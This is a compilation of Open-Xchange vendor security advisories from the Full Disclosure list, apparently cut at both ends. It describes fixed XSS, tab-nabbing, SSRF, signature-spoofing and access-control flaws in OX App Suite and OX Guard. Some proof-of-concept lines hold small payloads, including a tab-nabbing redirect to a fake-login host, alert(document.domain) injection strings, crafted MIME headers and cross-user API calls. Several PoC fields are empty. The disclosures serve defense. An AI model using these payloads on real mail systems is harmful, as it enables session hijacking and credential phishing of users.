7.10.2-rev14, 7.10.1-rev22, 7.8.4-rev64 Vendor notification: 2019-08-13 Solution date: 2019-10-18 Public disclosure: 2020-01-02 CVE reference: CVE-2019-16716 CVSS: 2.2 (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Under certain conditions the RMI default configuration could flip to unexpected values, allowing to invoke classes outside of the own codebase. Risk: In case the attacker is able to issue RMI provisioning commands it could be used to invoke malicious classes to the middlewares Java process. As a result malicious code could be executed on server-side. This requires to breach several level of security measures and elevated permissions on the target system. Steps to reproduce: 1. Can be best reproduced with Metasploits "java_rmi_server" script. Solution: We make sure that "java.rmi.server.useCodebaseOnly" is always "true" when initializing the RMI implementation. signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open-Xchange Security Advisory 2019-08-15
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX Guard Vendor: OX Software GmbH Internal reference: 65132 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.2 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.6.3-rev48, 7.8.4-rev59, 7.10.0-rev32, 7.10.1-rev14, 7.10.2-rev5 Vendor notification: 2019-05-09 Solution date: 2019-06-13 Public disclosure: 2019-08-15 CVE reference: CVE-2018-9997 CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Curly brackets can be used to bypass XSS sanitization in HTML mail and other HTML attachments. A variation of the original issue has been found thats based on incorrect global eventhandler blacklist entries. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a HTML mail with curly brackets that disguise event handlers in CSS 2. Make a App Suite user open the malicious mail Proof of concept: Solution: We updated the list of blacklisted event handlers to close this bypass, operators may add a workaround by updating "globaleventhandlers.list" and change the incorrect handler "onmounseleave" to "onmouseleave". -- Internal reference: 64992 (Bug ID) Vulnerability type: Data validation fault (CWE-34) Vulnerable version: 7.10.1 and earlier, 2.10.2 and earlier Vulnerable component: guard, backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version (guard): 2.8.0-rev22, 2.10.1-rev7 Fixed version (backend): 7.8.4-rev59, 7.10.1-rev14 Vendor notification: 2019-05-03 Solution date: 2019-06-13 Public disclosure: 2019-08-15 Researcher Credits: Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, and Jörg Schwenk CVE reference: CVE-2019-11521 CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) Vulnerability Details: Internal evaluation revealed that OX Guard is vulnerable to a subset of techniques used to display a valid signature from the identity of a trusted communication partner located in the mail header, although the crafted email is actually signed by an attacker. Our discoveries are based on work of a team of researchers, publishing these spoofing techniques under the "Johnny You Are Fired" project name. Risk: Recipients of signed PGP mail could be fooled to assume the mail originates from a trusted source rather than an attacker. This would elevate the mails trust level and potentially ease social-engineering attacks. Steps to reproduce: 1. Create mails that contain valid signatures but originate from a different source Proof of concept: https://github.com/RUB-NDS/Johnny-You-Are-Fired/tree/master/04-id Solution: We improved validation and make sure mail with valid signatures is only evaluated to be "trusted" if the sender matches the signature issuer. We also extended our API to provide more information about a specific signature to let clients add checks and handle invalid signature information. signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open-Xchange Security Advisory 2019-08-15
Dear subscribers,
we're sharing our latest advisory with you and like to thank everyone who
contributed in finding and solving those vulnerabilities. Feel free to join our
bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 64680 (Bug ID)
Vulnerability type: Content Spoofing (CWE-451)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-09
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11521
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
Vulnerability Details:
Appointment titles are rendered as hyperlink but were missing a protection
against "tab nabbing".
Risk:
When following a hyperlink to a malicious website, the original tab location
(OX App Suite) could be replaced with a URL chosen by the attacker. This can be
exploited to trick users to re-enter credentials to a seemingly legitimate
website and as a result take over accounts.
Steps to reproduce:
1. Create a appointment invitation that contains a link to a malicious website
including a blank "target" attribute
2. Make the user accept the invitation and click the hyperlink at the
appointments title
3. Provide a effective exploit to overwrite the users original URL and fake a
login page
Proof of concept:
Appointment title content:
Click Me! :-)
Payload:
window.opener.location.replace('//www.evil-fakelogin.com/');
Solution:
We extended the usage of existing protection mechanisms (blankshield) to this
case.
---
Internal reference: 64682 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0 and 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
Vulnerability Details:
When replying to a HTML E-Mail with specific payload, that payload could be
executed as script code. The user would have to have HTML composing enabled to
exploit this vulnerability. This vulnerability could happen as browsers
incorrectly "fix" HTML content as demonstrated by @kinugawamasato for Google
Search.
Risk:
Malicious script code can be executed within a users context. This can lead to
session hijacking or triggering unwanted actions via the web interface (sending
mail, deleting data etc.).
Steps to reproduce:
1. Create an E-Mail with malicious content and deliver it to the user
2. Make the user "reply" to the E-Mail
Proof of concept:
Test
Another XSS!
[FD] Open-Xchange Security Advisory 2019-04-01
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite Vendor: OX Software GmbH Internal reference: 61771 (Bug ID) Vulnerability type: Information Exposure (CWE-200) Vulnerable version: 7.10.1 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed Version: 7.6.3-rev44, 7.8.3-rev53, 7.8.4-rev51, 7.10.0-rev25, 7.10.1-rev7 Vendor notification: 2018-11-23 Solution date: 2019-02-13 Public disclosure: 2019-04-01 CVE reference: CVE-2019-7159 CVSS: 4.1 (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N) Vulnerability Details: The "oxsysreport" tool failed to sanitized custom configuration parameters that could contain credentials like API keys. Risk: Unintended configuration information has been collected and potentially sent to OX for further analysis. This transmission would happen through secure channels and to authorized personell. We have no indication that data was used illegitimately. Steps to reproduce: 1. Have configuration properties that don't match the expected format (e.g. commented out, custom key format) 2. Run oxsysreport and check what parameters have been sanitized Solution: We made sure to remove all incorrectly collected information and removed backups thereof. To solve the root cause, the oxsysreport tool has been updated to deal with other patterns of properties. --- Internal reference: 61315 (Bug ID) Vulnerability type: Improper Access Control (CWE-284) Vulnerable version: 7.10.1 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed Version: 7.8.3-rev53, 7.8.4-rev51, 7.10.0-rev25, 7.10.1-rev7 Vendor notification: 2018-11-06 Solution date: 2019-02-13 Public disclosure: 2019-04-01 CVE reference: CVE-2019-7158 CVSS: 4.2 (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N) Vulnerability Details: In case users did chose not to "stay signed in" or the operator disabled that functionality, cookies are maintained for a "session" lifetime to make sure they expire after the browser session has ended. Using "reload" on the existing browser session led to the impression that the session is already terminated as the login screen would be shown afterwards. However, those cookies are maintained by the browser for the remainder of the session until termination of the browser tab or window. Risk: Users could get the incorrect impression that their session has been terminated after reloading the browser window. In fact, the credentials for authentication (cookies) were maintained and other users with physical access to the browser could re-use them to execute API calls and access other users data. Steps to reproduce: 1. Login with "Stay signed in" disabled 2. Reload the browser 3. Check which cookies are maintained while the "login" page is displayed Solution: We now drop the session associated with existent secret cookie on server-side in case a new login is performed and thus a new secret cookie is about to be written. signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open-Xchange Security Advisory 2019-01-18
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (open-xchange, dovecot, powerdns) at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite Vendor: OX Software GmbH Internal reference: 59653 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.0 Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.0-rev13 Vendor notification: 2018-07-31 Solution date: 2018-08-21 Public disclosure: 2019-01-18 Researcher Credits: Gamal negm eldin CVE reference: CVE-2018-13104 CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Attachment file names in mail can be used to inject script code, in case the victim uses "mouse over" on the attachment. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a malicious multipart HTML E-Mail 2. Make the recipient to expand the "attachments" area and mouse-over the attachment Proof of concept: --=_Part_361_1510656222.1533025735063 Content-Type: image/svg+xml; name="w" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="w" Solution: We made sure to use the actual text node as label to avoid injecting DOM nodes. --- Internal reference: 59507 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.0 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.0-rev13, 7.8.4-rev40, 7.8.3-rev44, 7.6.3-rev34 Vendor notification: 2018-07-25 Solution date: 2018-08-16 Public disclosure: 2019-01-18 Researcher Credits: Zhihua Yao (chihuahua) CVE reference: CVE-2018-13104 CVSS: 3.5 (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: File names of attachments of PIM objects (appointments, contacts, tasks) can be used to inject script code. Sharing such objects with other users allows to attack them. This requires both a trust relationship between those users - or both have to be provisioned to the same context. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a PIM object, like an appointment 2. Upload a attachment with malicious file name 3. Make the victim open the object in detail view Proof of concept: ">.jpg Solution: We transformed file names to text nodes before adding them to DOM. --- Internal reference: 58742 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.8.4 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev39, 7.8.3-rev50, 7.6.3-rev41 Vendor notification: 2018-05-24 Solution date: 2018-08-21 Public disclosure: 2019-01-18 Researcher Credits: Secator CVE reference: CVE-2018-13104 CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Specific URL parameters can be used to circumvent handling of potentially malicious files. Usually we force the user agent to download such files instead of eventually opening them. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a malicious HTML file and upload it to Drive 2. Modify the file type to "application/xml" or "application/xhtml+xml" to trigger UA content guessing 3. Create a link to download that file and use the content_disposition=inline parameter 4. Share the link with some other user of the system, or a guest and make them open it Proof of concept: https://example.com/appsuite/api/files/html-xml?action=document=10=10%2F348_disposition=inline Solution: We now prefer server-side content-disposition defaults over client-side parameters when dealing with attachments. --- Internal reference: 56457 (Bug ID) Vulnerability type: Server-Side Request Forgery (CWE-918) Vulnerable version: 7.8.4 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev39, 7.8.3-rev50, 7.6.3-rev41 Vendor notification: 2017-12-11 Solution date: 2018-08-21 Public disclosure: 2019-01-18 Researcher Credits: stemcloud CVE reference: CVE-2018-13103 CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Data with references to external content, like images of a contact imported as vcard, can be used to
[FD] Open-Xchange Security Advisory 2018-07-02
This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a HTML mail with malicious content at hyperlinks and use HTML encoding to cloak it 2. Make a App Suite user open the malicious link Proof of concept: For HTML: http://qwe-alert(document.domain)-">click For Contacts (vCard): URL:qwe"-alert(document.domain)-" Solution: We added encoding and sanitization when handling encoded hyperlinks on the frontend. --- Internal reference: 57095 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.8.4 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.6.3-rev37, 7.8.2-rev40, 7.8.3-rev48, 7.8.4-rev28 Vendor notification: 2018-02-12 Solution date: 2018-04-24 Public disclosure: 2018-07-02 Researcher Credits: Secator CVE reference: CVE-2018-9997 CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Curly brackets can be used to bypass XSS sanitization in HTML mail and other HTML attachments. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a HTML mail with curly brackets that disguise event handlers in CSS 2. Make a App Suite user open the malicious mail Proof of concept: Solution: We identify and drop potentially harmful content within CSS. --- Internal reference: 57016 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.8.4 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.6.3-rev37, 7.8.2-rev40, 7.8.3-rev48, 7.8.4-rev28 Vendor notification: 2018-02-06 Solution date: 2018-04-24 Public disclosure: 2018-07-02 Researcher Credits: Secator CVE reference: CVE-2018-9997 CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: Some browsers produce security issues when dealing with unknown content-types while handling downloads and by that circumvent our server-side efforts to safeguard users. In this case, Mozilla Firefox can be forced to guess a specific content type by providing unicode content-type and defining a specific file-name. The browser will examine the "name" attribute and eventually run malicious code within the current browser session. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Steps to reproduce: 1. Create a malicious XML file and modify its content-type, set a specific "name" 2. Upload, embed and make someone open this file with Firefox Proof of concept: Content-Type: garbageЯ/garbage; name=html-xml-svg Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=html-xml-svg Solution: We now detect and deny handling of suspicious media-types. Yours sincerely, Martin Heiland, Open-Xchange GmbH signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open-Xchange Security Advisory 2018-06-08
Dear subscribers,
we've migrated our public disclosure workflow to full-disclosure and are
catching up on publishing recent vulnerabilities through this channel. Feel
free to join our bug bounty programs (open-xchange, dovecot, powerdns) at
HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 55872 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev30, 7.8.2-rev30, 7.8.3-rev36, 7.8.4-rev18
Vendor notification: 2017-10-18
Solution date: 2018-02-08
Public disclosure: 2018-06-08
CVE reference: CVE-2018-5754
CVSS: n/a
Vulnerability Details:
Internet Explorer does not properly support modern Content Security Policies
("CSP"), which act as a failsafe for certain XSS attacks. Since the "Open in
Browser" feature is a potential attack vector to inject malicious content, we
removed that option at the user interface. Instead, users shall download
attachments and open them from their device. This removes the issue of
executing script-code under the same domain.
Risk:
Malicious script code can be executed within a users context. This can lead to
session hijacking or triggering unwanted actions via the web interface (sending
mail, deleting data etc.).
Steps to reproduce:
1. This is a precautionary change
Solution:
We no longer offer "Open in Browser" for IE based browsers. Microsoft Edge is
not affected by this change.
---
Internal reference: 56333 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-11-30
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Michael Reizelman
CVE reference: CVE-2018-5756
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Permission checks for tasks were incomplete with regards to folder-to-object
association.
Risk:
Users within the same context could delete other users tasks.
Steps to reproduce:
1. Create a task as User A (ID: 1)
2. As User B, trigger a /api/tasks?action=delete call with task ID 1 but a
valid task folder ID of User B
Solution:
We enhanced permission checks for tasks for the "delete" call and check for
folder-to-object association.
---
Internal reference: 56359 (Bug ID)
Vulnerability type: Improper Privilege Management (CWE-269)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-12-01
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Michael Reizelman
CVE reference: CVE-2018-5756
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
Vulnerability Details:
Permission checks for appointments were incomplete with regards to
folder-to-object association.
Risk:
Users within the same context were able to add external participants to other
users appointments. Those users would potentially get notified about subsequent
appointment changes and could therefor gather information beyond their
permission level.
Steps to reproduce:
1. Create a appointment as User A (ID: 1)
2. As User B, trigger a /api/calendar?action=confirm call with appointment ID 1
but a valid appointment folder ID of User B
3. Include a external participant in this "confirm" call
{"confirmmessage":"","confirmation":1, "type":5, "mail":"t...@example.com"}
Solution:
We enhanced permission checks for appointments for the "confirm" call and check
for folder-to-object association.
---
Internal reference: 56334 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev36, 7.8.2-rev39, 7.8.3-rev44, 7.8.4-rev22
Vendor notification: 2017-11-30
Solution date: 2018-02-08
Public disclosure: 2018-06-08
Researcher Credits: Alan Watt
CVE reference: CVE-2018-5752
CVSS: 6.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)
Vulnerability Details:
OX App Suite tries to look up external mail account configuration using XML
files for auto-configuration, that are placed at most mail providers hosts.
Redirects of external HTTP services could be used to access local or internal
networks instead, when looking up that external account information.
Risk:
By validating error codes and request duration, attackers can get insight about
internal network configuration, open ports and associated servi
